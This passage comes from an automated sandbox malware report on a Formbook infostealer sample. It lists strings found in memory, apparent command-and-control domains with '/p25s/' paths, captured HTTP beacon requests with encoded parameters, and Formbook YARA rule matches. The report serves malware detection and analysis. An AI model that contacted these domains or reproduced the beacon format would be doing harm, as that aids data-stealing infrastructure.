          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iqd964.comReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jdyokum.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jdyokum.com/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jdyokum.com/p25s/www.iftar.rsvp
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.jdyokum.comReferer:
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.katkisiz.info
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.katkisiz.info/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.katkisiz.info/p25s/www.32612.xyz
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.katkisiz.infoReferer:
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pfokn.online
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pfokn.online/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pfokn.online/p25s/www.katkisiz.info
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.pfokn.onlineReferer:
          Source: explorer.exe, 00000004.00000002.588065126.00000000157BF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000567F000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.qq.com/404/search_children.js
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tjhymzz.com
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tjhymzz.com/p25s/
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tjhymzz.com/p25s/www.blueskyinteractives.co.uk
          Source: explorer.exe, 00000004.00000003.561966949.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.558205165.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.533932215.000000000ED5A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.564379972.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.583848773.000000000ED69000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.535285432.000000000ED62000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.tjhymzz.comReferer:
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.348735963.0000000006B82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.anbietertest.com
          Source: global trafficHTTP traffic detected: GET /p25s/?T6AhrZK=8vxucxXa/EdtAtEUVmScDgQ/joE+PM1yWDdp5simyx02ZDdzbP+rJDfYcK0t31FDPOoC&W2MXm=JzuDhNAPN4 HTTP/1.1Host: www.anbietertest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p25s/?T6AhrZK=ewBdcR2k39opbljxfcdCb6O0QV5Mz3QFjc7TltSJEncU02WcdPmt9gDEZVm+Mf599Sy4&W2MXm=JzuDhNAPN4 HTTP/1.1Host: www.hblcfl.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p25s/?T6AhrZK=Ph2/VWOiWysesScqmGnEABkQXxW9tNK0oaQwIZbckmwGK9MQJoSsZuxrXVYCsjKEmA2B&W2MXm=JzuDhNAPN4 HTTP/1.1Host: www.desipizza.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p25s/?T6AhrZK=yZFdiTidJj8nP1vzUKUfsyX5oeLLmZHlT7g0d1PIFjuzqgtSB3FqzQPSF8sPoM2nTXau&W2MXm=JzuDhNAPN4 HTTP/1.1Host: www.couldskuathink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.582276153.000000000E3F1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe PID: 1092, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: MSBuild.exe PID: 2808, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: cmmon32.exe PID: 5908, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.3e4c0b8.12.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.568278473.0000000000FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.342450327.0000000003E4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.567824406.0000000000C30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
